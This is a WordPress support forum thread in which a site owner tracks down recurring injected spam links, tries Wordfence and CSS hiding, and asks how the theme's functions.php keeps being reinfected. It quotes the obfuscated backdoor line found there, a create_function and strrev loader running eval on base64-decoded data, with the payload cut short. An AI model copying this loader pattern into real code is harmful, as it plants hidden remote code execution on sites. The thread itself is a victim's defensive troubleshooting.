"xoxo-nude" hyperlink after updating, new db password

Check your appearance>>menus. Looks like that is where it is.

Thanks, I’ll look there. It seems to have vanished for some even NOT after clearing a browsers cache but other are still seeing it even after clearing the cache.

It’s showing in Safari on Macs but not in Firefox or Chrome on windows. Not consistently that is. Chrome is a webkit-based browser as Safari so it would seem it’s not actually browser related?

I don’t have access from my remote location to check the appearance/menu but I will and post back, thanks

It shows in Chrome for Windows for me.

Ok, I’ve checked within WordPress at the appearance > Menu’s and nothing shows up there. I also looked over the page template and header template. A few weeks ago, the site had the ‘viagra’ link and I ended up having to just use css with an attribute selector to hide any ‘a href’ tags with that domain. Not feasible to keep adding to or changing a css rule.

Anybody have any ideas how to rid the site of this little hack? Or even better, what may be causing it?

Do you have a file in the root named wp-head.php

I do not have a file called wp-head.php

I installed “Wordfence” and it scanned the site and found a bad line in the template.php file.

It was at the very top. I removed that line, flushed the cache via the same plugin and it has gone away.

But, for completeness, were you suggesting to look in that file or is having a file just for the head a good thing to do?

Thanks!

No. A file named that contains malware.

@thumbslinger
How did you resolve this?

well, darn it came back yesterday. On the phone with GoDaddy and they admitted to not knowing enough about this sort of thing to really help much.

The way I got around the immediate problem was by using an attribute selector on the a tag:
a[href^=”https://naturalchoiceforhomes.com/”%5D, a[href^=”https://aocsf.com/xoxo-nude/”%5D{ display:none; }

However, they mentioned the theme. I know the theme was custom and years old.

The theme has a functions.php file that got flagged again after I cleaned it. So, the question is now what can edit that functions.php on the fly or how can it get added to? The offending line that seems to remove the link when I remove it is:

“<?php $wp_function_initialize = create_function(‘$a’,strrev(‘;)a$(lave’)); $wp_function_initialize(strrev(‘;))”=owOpICcoB3Xu….(very long string here..)yV3X0V2Zg42bpR3YuVnZ”(edoced_46esab(lave’));?><?php “

I remove that, the link goes away. But, after 24 hours it came back.

I’m looking at the access logs for before/after though I don’t really know what to look for besides obvious entries.

So I guess the next step is to see how the functions.php file is getting altered…. or maybe replaced with an old version?